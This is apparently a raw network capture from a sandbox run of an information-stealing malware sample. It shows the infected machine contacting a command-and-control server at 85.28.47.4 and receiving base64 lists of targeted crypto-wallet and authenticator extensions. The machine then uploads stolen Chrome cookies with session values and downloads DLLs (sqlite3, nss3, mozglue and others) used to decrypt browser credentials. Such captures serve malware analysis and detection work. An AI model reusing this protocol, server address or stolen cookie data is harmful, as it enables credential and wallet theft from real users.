                                                                Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmh
                                                                Jun 27, 2024 05:58:03.474879026 CEST252INData Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47
                                                                Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
                                                                Jun 27, 2024 05:58:03.476659060 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                Host: 85.28.47.4
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a
                                                                Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"fplugins------AFHDAKJKFCFBGCBGDHCB--
                                                                Jun 27, 2024 05:58:03.652641058 CEST335INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:03 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                Jun 27, 2024 05:58:03.673444986 CEST198OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD
                                                                Host: 85.28.47.4
                                                                Content-Length: 6107
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:03.673501015 CEST6107OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64
                                                                Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                Jun 27, 2024 05:58:04.385294914 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:03 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:04.674624920 CEST89OUTGET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:04.856892109 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:04 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                ETag: "10e436-5e7eeebed8d80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1106998
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                Jun 27, 2024 05:58:04.856940985 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                Data Ascii: #N@B/81s:<R@B/92P @B
                                                                Jun 27, 2024 05:58:04.856950998 CEST448INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                Jun 27, 2024 05:58:04.857043982 CEST1236INData Raw: 0e 70 eb 61 89 04 24 ff 15 80 02 ed 61 52 52 89 c2 85 d2 74 09 c7 04 24 78 67 eb 61 ff d2 c7 04 24 96 14 e0 61 e8 fc e2 0a 00 c9 c3 55 89 e5 5d c3 90 03 14 85 a0 c3 ec 61 55 89 e5 89 14 85 a0 c3 ec 61 83 c0 08 3b 14 85 a8 c3 ec 61 76 07 89 14 85
                                                                Data Ascii: pa$aRRt$xga$aU]aUa;ava]tUS$R[]UWVS,u}L$T$$t$|$S,[^_]UWVS,u}L$T$$t$|$S,[^_]UV0T$L$$V^]
                                                                Jun 27, 2024 05:58:06.036576986 CEST948OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI
                                                                Host: 85.28.47.4
                                                                Content-Length: 751
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------ECGHJJEHDHCAAKFIIDGI--
                                                                Jun 27, 2024 05:58:06.741636038 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:06 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:06.811573029 CEST556OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA
                                                                Host: 85.28.47.4
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 [TRUNCATED]
                                                                Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
                                                                Jun 27, 2024 05:58:07.518026114 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:06 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=93
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:08.328393936 CEST556OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI
                                                                Host: 85.28.47.4
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b [TRUNCATED]
                                                                Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
                                                                Jun 27, 2024 05:58:09.027452946 CEST202INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:08 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=92
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jun 27, 2024 05:58:09.304641962 CEST89OUTGET /69934896f997d5bb/freebl3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:09.480051041 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "a7550-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 685392
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                Jun 27, 2024 05:58:10.120942116 CEST89OUTGET /69934896f997d5bb/mozglue.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:10.301701069 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "94750-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 608080
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                Jun 27, 2024 05:58:10.696230888 CEST90OUTGET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:10.871401072 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "6dde8-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 450024
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                Jun 27, 2024 05:58:11.172964096 CEST86OUTGET /69934896f997d5bb/nss3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:11.347755909 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:11 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "1f3950-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 2046288
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                Jun 27, 2024 05:58:12.754390001 CEST90OUTGET /69934896f997d5bb/softokn3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jun 27, 2024 05:58:12.929486990 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:12 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "3ef50-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 257872
                                                                Content-Type: application/x-msdos-program
